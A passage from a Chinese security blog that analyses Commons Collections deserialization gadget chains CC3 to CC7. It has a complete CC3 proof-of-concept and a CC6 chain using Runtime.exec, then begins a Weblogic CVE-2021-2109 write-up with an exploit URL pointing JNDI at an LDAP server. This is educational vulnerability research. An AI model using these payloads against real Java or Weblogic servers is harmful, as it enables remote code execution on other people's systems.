data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302154315855.png" alt="image-20210302154315855"></p><p>调用 input 的 getConstructor() 方法,其作用是重载构造函数,接着通过 newInstance() 方法调用它的构造函数,这里就是调用 TrAXFilter 的构造函数,继续看 TrAXFilter 的构造函数</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302155208191.png" alt="image-20210302155208191"></p><p>这里会调用 templates#newTransformer() 方法,看到这里应该明白 CC3 是如何执行命令的了,还是通过 TemplatesImpl 。TemplatesImpl 的 newTransformer() 方法可以加载字节码执行命令。</p><h2 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h2><p>InstantiateTransformer#transform() 方法 可以调用任意类的构造函数</p><p>TrAXFilter 类的构造函数会调用 templates 的 newTransformer() 方法</p><p>然后配合 ChainedTransformer 的 transform 方法的链式调用和 TemplatesImpl 利用链</p><p>写代码实现一下整条链</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> payload;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InstantiateTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.LazyMap;</span><br><span class="line"><span class="keyword">import</span> org.apache.xalan.xsltc.trax.TemplatesImpl;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.Gadgets;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.xml.transform.Templates;</span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Retention;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationHandler;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationTargetException;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Proxy;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">CommonCollections3</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</span><br><span class="line"> <span class="comment">// 直接用 ysoserial 的 Gadgets.createTemplatesImpl创建一个恶意 templates 类</span></span><br><span class="line"> String args1 = <span class="string">"/System/Applications/Calculator.app/Contents/MacOS/Calculator"</span>;</span><br><span class="line"> Object templatesImpl = Gadgets.createTemplatesImpl(args1);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 构造 Transformer 数组</span></span><br><span class="line"> Transformer[] transformers = <span class="keyword">new</span> Transformer[]{</span><br><span class="line"> <span class="keyword">new</span> ConstantTransformer(TrAXFilter.class),</span><br><span class="line"> <span class="comment">// 参数类型为 TemplatesImpl ,值为构造的 templates</span></span><br><span class="line"> <span class="keyword">new</span> InstantiateTransformer(<span class="keyword">new</span> Class[]{Templates.class}, <span class="keyword">new</span> Object[]{templatesImpl}),</span><br><span class="line"> };</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="comment">// 后边与 CC1 一样</span></span><br><span class="line"> ChainedTransformer chainedTransformer = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line"> <span class="comment">//chainedTransformer.transform(1);</span></span><br><span class="line"></span><br><span class="line"> Map innerMap = <span class="keyword">new</span> HashMap();</span><br><span class="line"></span><br><span class="line"> Map lazyMap = LazyMap.decorate(innerMap, chainedTransformer);</span><br><span class="line"></span><br><span class="line"> <span class="comment">//实例一个 AnnotationInvocationHandler 类</span></span><br><span class="line"> Class clazz = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line"> Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line"> construct.setAccessible(<span class="keyword">true</span>);</span><br><span class="line"> InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, lazyMap);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 创建 AnnotationInvocationHandler 的代理</span></span><br><span class="line"> Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), <span class="keyword">new</span> Class[] {Map.class}, handler);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 在实例化一个 AnnotationInvocationHandler 包裹我们的代理对象 proxyMap</span></span><br><span class="line"> handler = (InvocationHandler) construct.newInstance(Retention.class, proxyMap);</span><br><span class="line"></span><br><span class="line"> ByteArrayOutputStream barr = <span class="keyword">new</span> ByteArrayOutputStream();</span><br><span class="line"> ObjectOutputStream oos = <span class="keyword">new</span> ObjectOutputStream(barr);</span><br><span class="line"> oos.writeObject(handler);</span><br><span class="line"> oos.close();</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> System.out.println(barr);</span><br><span class="line"> ObjectInputStream ois = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> ByteArrayInputStream(barr.toByteArray()));</span><br><span class="line"> Object o = (Object)ois.readObject();</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302162126024.png" alt="image-20210302162126024"></p><h1 id="CommonCollections4"><a href="#CommonCollections4" class="headerlink" title="CommonCollections4"></a>CommonCollections4</h1><p>commons-collections4.0</p><h2 id="利用链分析-2"><a href="#利用链分析-2" class="headerlink" title="利用链分析"></a>利用链分析</h2><p>CC4 其实就是 CC2 的前半段 + CC3 的后半段组合一下。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302162751915.png" alt="image-20210302162751915"></p><h2 id="总结-2"><a href="#总结-2" class="headerlink" title="总结"></a>总结</h2><p>CC2 是通过 PriorityQueue 反序列化的时候会对队列中的元素使用比较器的 compare 方法即 TransformingComparator#compare() 去处理,在 TransformingComparator#compare() 中会调用 InvokerTransformer 的 transform 方法处理 queue 中的值。</p><p>CC3 则是通过 AnnotationInvocationHandler+LazyMap#get() 触发 ChainedTransformer 的 transform 方法从而执行命令</p><p>两个组合一下把 CC2 的 InvokerTransformer 替换成 CC3 里的ChainedTransformer 就得到 CC4 了</p><h1 id="CommonCollections5"><a href="#CommonCollections5" class="headerlink" title="CommonCollections5"></a>CommonCollections5</h1><p><code>commons-collections3.1</code> 由 <code>BadAttributeValueExpException</code> 触发所以高版本的 jdk8 也可以利用,有SecurityManager 限制,在 jdk 8u76之后,需要没有设置security manager才能触发这条gadget</p><h2 id="利用链分析-3"><a href="#利用链分析-3" class="headerlink" title="利用链分析"></a>利用链分析</h2><p>在 CC1 中是通过 AnnotationInvocationHandler#invoke() 方法调用 lazyMap#get() 进而调用 ChainedTransformer#transform(),AnnotationInvocationHandler 类的 readObject 方法中并没有直接调用到 Map 的 get 方法,所以只能通过 java 动态代理机制去触发,而 CC5 就是找到了一个在 readObject 方法 中调用了 lazyMap#get() 的类。</p><p>直接看后半部分</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">....</span><br><span class="line"></span><br><span class="line">TiedMapEntry entry = <span class="keyword">new</span> TiedMapEntry(lazyMap, <span class="string">"foo"</span>);</span><br><span class="line"></span><br><span class="line">BadAttributeValueExpException val = <span class="keyword">new</span> BadAttributeValueExpException(<span class="keyword">null</span>);</span><br><span class="line">Field valfield = val.getClass().getDeclaredField(<span class="string">"val"</span>);</span><br><span class="line"> Reflections.setAccessible(valfield);</span><br><span class="line">valfield.set(val, entry);</span><br><span class="line"></span><br><span class="line">Reflections.setFieldValue(transformerChain, <span class="string">"iTransformers"</span>, transformers); <span class="comment">// arm with actual transformer chain</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> val;</span><br></pre></td></tr></table></figure><p>这个类就是 BadAttributeValueExpException</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">// 这段就是通过反射机制设置 val的 val 为 entry </span><br><span class="line">Field valfield = val.getClass().getDeclaredField("val");</span><br><span class="line"> Reflections.setAccessible(valfield);</span><br><span class="line">valfield.set(val, entry);</span><br></pre></td></tr></table></figure><p>看 BadAttributeValueExpException 的 readobject 方法</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302175053634.png" alt="image-20210302175053634"></p><p>在 BadAttributeValueExpException#readobject() 调用了 TiedMapEntry#toString() ,注意前面有个 if ,需要满足<code>System.getSecurityManager() == null</code>,也就是没有设置 SecurityManager,在 jdk 8u76之后,需要没有设置security manager才能触发这条gadget。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302175141956.png" alt="image-20210302175141956"></p><p>在 TiedMapEntry#toString() 里调用了 TiedMapEntry#getValue()</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302175613232.png" alt="image-20210302175613232"></p><p>最终在 TiedMapEntry#getValue() 方法里调用了 lazyMap#get() ,后面就是 CC1 链的内容了。</p><h2 id="总结-3"><a href="#总结-3" class="headerlink" title="总结"></a>总结</h2><p>调用栈:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">ObjectInputStream.readObject()</span><br><span class="line"> BadAttributeValueExpException.readObject()</span><br><span class="line"> TiedMapEntry.toString()</span><br><span class="line"> TiedMapEntry.getValue()</span><br><span class="line"> LazyMap.get()</span><br><span class="line"> ChainedTransformer.transform()</span><br><span class="line"> ConstantTransformer.transform()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Class.getMethod()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Runtime.getRuntime()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Runtime.exec()</span><br></pre></td></tr></table></figure><h2 id="CommonCollections6"><a href="#CommonCollections6" class="headerlink" title="CommonCollections6"></a>CommonCollections6</h2><p><code>commons-collections3.1</code> 由 BadAttributeValueExpException 触发,比较通用的一个版本</p><h2 id="利用链分析-4"><a href="#利用链分析-4" class="headerlink" title="利用链分析"></a>利用链分析</h2><p>CC6 与CC5 一样都是对 CC1 的改进,CC5 是用 BadAttributeValueExpException#readobject 调用 TiedMapEntry#getValue() 从而调用 LazyMap#get(),而 CC6 换成了 HashSet</p><p>ysoserial 里的 CC6 链做了很多优化,看起来很复杂,这是网上的简化版本。</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">Transformer Testtransformer = <span class="keyword">new</span> ChainedTransformer(<span class="keyword">new</span> Transformer[]{});</span><br><span class="line"></span><br><span class="line"> Transformer[] transformers=<span class="keyword">new</span> Transformer[]{</span><br><span class="line"> <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>,<span class="keyword">new</span> Class[]{String.class,Class[].class},<span class="keyword">new</span> Object[]{<span class="string">"getRuntime"</span>,<span class="keyword">new</span> Class[]{}}),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>,<span class="keyword">new</span> Class[]{Object.class,Object[].class},<span class="keyword">new</span> Object[]{<span class="keyword">null</span>,<span class="keyword">new</span> Object[]{}}),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>,<span class="keyword">new</span> Class[]{String.class},<span class="keyword">new</span> Object[]{<span class="string">"calc"</span>})</span><br><span class="line"> };</span><br><span class="line"></span><br><span class="line"> Map map=<span class="keyword">new</span> HashMap();</span><br><span class="line"> Map lazyMap=LazyMap.decorate(map,Testtransformer);</span><br><span class="line"></span><br><span class="line"> TiedMapEntry tiedMapEntry=<span class="keyword">new</span> TiedMapEntry(lazyMap,<span class="string">"test1"</span>);</span><br><span class="line"></span><br><span class="line"> HashSet hashSet=<span class="keyword">new</span> HashSet(<span class="number">1</span>);</span><br><span class="line"> hashSet.add(tiedMapEntry);</span><br><span class="line"> lazyMap.remove(<span class="string">"test1"</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">//通过反射覆盖原本的iTransformers,防止序列化时在本地执行命令</span></span><br><span class="line"> Field field = ChainedTransformer.class.getDeclaredField(<span class="string">"iTransformers"</span>);</span><br><span class="line"> field.setAccessible(<span class="keyword">true</span>);</span><br><span class="line"> field.set(Testtransformer, transformers);</span><br></pre></td></tr></table></figure><p>看 HashSet 的 readobject() 方法</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">readObject</span><span class="params">(java.io.ObjectInputStream s)</span></span></span><br><span class="line"><span class="function"> <span class="keyword">throws</span> java.io.IOException, ClassNotFoundException </span>{</span><br><span class="line">......</span><br><span class="line"> <span class="comment">// Read in all elements in the proper order.</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i=<span class="number">0</span>; i<size; i++) {</span><br><span class="line"> <span class="meta">@SuppressWarnings("unchecked")</span></span><br><span class="line"> E e = (E) s.readObject();</span><br><span class="line"> map.put(e, PRESENT);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>调用了 map.put() ,这里的 map 就是 HashMap</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302183233785.png" alt="image-20210302183233785"></p><p>继续看 HashMap#put() </p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302183718799.png" alt="image-20210302183718799"></p><p>在 HashMap#put() 会用 HashMap#hash() 处理 key 继续跟进,这里的 key 就是前边构造的 TiedMapEntry</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302184652108.png" alt="image-20210302184652108"></p><p>这里调用了 key.hashCode() 也就是 TiedMapEntry#hashCode(),继续看 TiedMapEntry#hashCode()</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302184812406.png" alt="image-20210302184812406"></p><p>在TiedMapEntry#hashCode() 里调用了自身的 getvalue 方法</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302185135224.png" alt="image-20210302185135224"></p><p>在这里调用了 map.get() 也就是 lazyMap#get() ,后面就和 CC1 一样了</p><h2 id="总结-4"><a href="#总结-4" class="headerlink" title="总结"></a>总结</h2><p>调用栈:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">java.io.ObjectInputStream.readObject()</span><br><span class="line"> java.util.HashSet.readObject()</span><br><span class="line"> java.util.HashMap.put()</span><br><span class="line"> java.util.HashMap.hash()</span><br><span class="line"> org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()</span><br><span class="line"> org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()</span><br><span class="line"> org.apache.commons.collections.map.LazyMap.get()</span><br><span class="line"> org.apache.commons.collections.functors.ChainedTransformer.transform()</span><br><span class="line"> org.apache.commons.collections.functors.InvokerTransformer.transform()</span><br><span class="line"> java.lang.reflect.Method.invoke()</span><br><span class="line"> java.lang.Runtime.exec()</span><br></pre></td></tr></table></figure><h1 id="CommonCollections7"><a href="#CommonCollections7" class="headerlink" title="CommonCollections7"></a>CommonCollections7</h1><p><code>commons-collections3.1</code> 由 HashTable 触发,比较通用的一个版本</p><h2 id="利用链分析-5"><a href="#利用链分析-5" class="headerlink" title="利用链分析"></a>利用链分析</h2><p>CC7 同 CC6 与CC5 一样都是对 CC1 的改进,CC7 用的是 Hashtable</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210303113147348.png" alt="image-20210303113147348"></p><p>直接看 Hashtable#readobject()</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210303113244652.png" alt="image-20210303113244652"></p><p>调用了自身的 reconstitutionPut() 方法</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210303113357299.png" alt="image-20210303113357299"></p><p>在 HashTable#reconstitutionPut() 会将 HashTable 里的键名(key)互相比较,payload 中我们构造 HashTable 时存入了两个LazyMap 作为 key。所以这里相当于调用了 LazyMap#equals()</p><p>LazyMap 类并没有实现 equals() 方法,在它的父类 AbstractMapDecorator 里定义了。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210303113804993.png" alt="image-20210303113804993"></p><p>在AbstractMapDecorator#equals() 又会调用 this.map.equals() 这里的 this.map 是构造 LazyMap 时的 HashMap</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210303123658274.png" alt="image-20210303123658274"></p><p>继续看 HashMap#equals() ,在 HashMap 的父类 AbstractMap 里定义的 equals() </p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210303124114485.png" alt="image-20210303124114485"></p><p>在这里就调用了 lazyMap#get() ,后面就和 CC1 一样了</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210303124420614.png" alt="image-20210303124420614"></p><p>在构造 LazyMap 的时候分别 put 了两个键值 yy zZ。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210303124736520.png" alt="image-20210303124736520"></p><p>原因是在 HashTable#reconstitutionPut() 中进入<code> e.key.equals(key)</code>需要满足<code>e.hash == hash</code>,也就是 key 的 hashcode 需要相同,打印下”yy”和”zZ”的 hashCode 之后会发现哈希值是一样的。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">System.out.println("yy".hashCode()); // 3872</span><br><span class="line">System.out.println("zZ".hashCode()); // 3872</span><br></pre></td></tr></table></figure><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210303124923198.png"></p><p>后边 lazyMap2.remove(“yy”);是因为hashtable有两次put的操作,在第二次<code>hashtable.put(lazyMap2, 2);</code>时,会触发LazyMap 的 get 方法,会新增一个 key/value 值相同的键值对,所以此时会多出一个<code>yy</code>。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210303125503819.png" alt="image-20210303125503819"></p><h2 id="总结-5"><a href="#总结-5" class="headerlink" title="总结"></a>总结</h2><p>调用栈:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">java.util.Hashtable.readObject</span><br><span class="line">java.util.Hashtable.reconstitutionPut</span><br><span class="line">org.apache.commons.collections.map.AbstractMapDecorator.equals</span><br><span class="line">java.util.AbstractMap.equals</span><br><span class="line">org.apache.commons.collections.map.LazyMap.get</span><br><span class="line">org.apache.commons.collections.functors.ChainedTransformer.transform</span><br><span class="line">org.apache.commons.collections.functors.InvokerTransformer.transform</span><br><span class="line">java.lang.reflect.Method.invoke</span><br><span class="line">sun.reflect.DelegatingMethodAccessorImpl.invoke</span><br><span class="line">sun.reflect.NativeMethodAccessorImpl.invoke</span><br><span class="line">sun.reflect.NativeMethodAccessorImpl.invoke0</span><br><span class="line">java.lang.Runtime.exec</span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> JAVA安全 </category>
</categories>
<tags>
<tag> JAVA安全 </tag>
<tag> 反序列化 </tag>
<tag> CommonCollections </tag>
</tags>
</entry>
<entry>
<title>Weblogic LDAP 远程代码执行漏洞分析(CVE-2021-2109)</title>
<link href="2021/03/01/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89%E7%9A%84/"/>
<url>2021/03/01/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89%E7%9A%84/</url>
<content type="html"><![CDATA[<h2 id="影响版本:"><a href="#影响版本:" class="headerlink" title="影响版本:"></a>影响版本:</h2><p> WebLogic Server 10.3.6.0.0<br> WebLogic Server 12.1.3.0.0<br> WebLogic Server 12.2.1.3.0<br> WebLogic Server 12.2.1.4.0<br> WebLogic Server 14.1.1.0.0</p><h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>JNDI 注入漏洞,需要登录控制台或者配合 CVE-2020-14882 未授权漏洞。</p><h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>先看 payload <code>/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.43.43;23:1389/Basic/WeblogicEcho;AdminServer%22)</code></p><p>从 consolejndi.portal 开始看起,直接定位 JNDIBindingPageGeneral</p><p>/weblogic_jars/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/consolejndi.portal</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301155539938.png" alt="image-20210301155539938"></p><p>继续跟进到 /PortalConfig/jndi/jndibinding.portlet</p><p>/weblogic_jars/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/PortalConfig/jndi/jndibinding.portlet</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301155825824.png" alt="image-20210301155825824"></p><p>JNDIBindingAction 类应该就是触发漏洞的入口了</p><p>com.bea.console.actions.jndi.JNDIBindingAction</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Weblogic%20LDAP%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2021-2109%EF%BC%89.assets/image-20210301160258094.png" alt="image-20210301160258094"></p><p>找到了 jndi 注入关键的 lookup 函数,参数为 context + “.” + 